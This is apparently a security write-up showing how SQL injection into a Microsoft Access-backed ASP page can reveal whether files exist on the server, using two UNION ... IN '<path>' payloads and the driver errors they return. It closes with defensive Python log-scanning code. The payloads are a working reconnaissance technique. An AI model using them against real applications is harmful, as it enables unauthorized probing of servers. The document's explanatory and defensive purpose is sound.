SQL Injection and Microsoft Access
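An unauthenticated SQL injection point in an application backed by a Microsoft Access database will probably not lead to leakage of sensitive information. However, the error messages returned by Access can still be used to verify whether a specific file exists on the server's file system. The driver reports "Could not find file" when the path does not exist and "Unrecognized database format" when the file exists but is not an Access database, as the two responses here show: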
Injection: ' union select 1 from blah in '\foo' where 1=1 or 'a'='
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'c:\foo'.
/search/sub_search.asp, line 209

Injection: ' union select 1 from blah in '\boot.ini' where 1=1 or 'a'='
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'c:\boot.ini'.
/search/sub_search.asp, line 209
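For defenders, the same two signals can be searched for in request and response logs. The following is an added example, not code from the original post: it flags parameters that carry an Access `IN '<path>'` clause and responses that return the raw driver error. The parameter name `q`, the record layout and the sample traffic are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Access external-database clause as used in the post: FROM <table> IN '<path>'
IN_CLAUSE = re.compile(r"\bfrom\s+\S+\s+in\s+['\"]([^'\"]+)['\"]", re.IGNORECASE)

# The two driver messages quoted in the post, with the path each one discloses
DRIVER_ERROR = re.compile(
    r"\[Microsoft\]\[ODBC Microsoft Access Driver\] "
    r"(Could not find file|Unrecognized database format) '([^']+)'"
)

def probed_paths(query_string):
    """Return (parameter, path) pairs for parameters carrying an IN '<path>' clause."""
    hits = []
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        for m in IN_CLAUSE.finditer(value):
            hits.append((name, m.group(1)))
    return hits

def leaked_file_state(body):
    """Return (path, exists) if the response exposes a raw driver error, else None."""
    m = DRIVER_ERROR.search(body)
    if m is None:
        return None
    # "Unrecognized database format" means the file was found and opened
    return m.group(2), m.group(1) == "Unrecognized database format"

def review(records):
    """Return one finding per (query_string, response_body) record that probed a path."""
    findings = []
    for qs, body in records:
        for param, path in probed_paths(qs):
            findings.append({"param": param, "probe": path,
                             "leak": leaked_file_state(body)})
    return findings

# Constructed sample traffic (URL-encoded forms of the post's two requests, plus a benign search)
SAMPLE = [
    ("q=%27+union+select+1+from+blah+in+%27%5Cfoo%27+where+1%3D1+or+%27a%27%3D%27",
     r"[Microsoft][ODBC Microsoft Access Driver] Could not find file 'c:\foo'."),
    ("q=%27+union+select+1+from+blah+in+%27%5Cboot.ini%27+where+1%3D1+or+%27a%27%3D%27",
     r"[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'c:\boot.ini'."),
    ("q=made+in+china+from+2010", "<html>3 results</html>"),
]

if __name__ == "__main__":
    for finding in review(SAMPLE):
        print(finding)
```

A finding whose `leak` field is not `None` means the application is returning raw driver errors to the client; parameterized queries and a generic error page remove both the injection point and the file-existence signal.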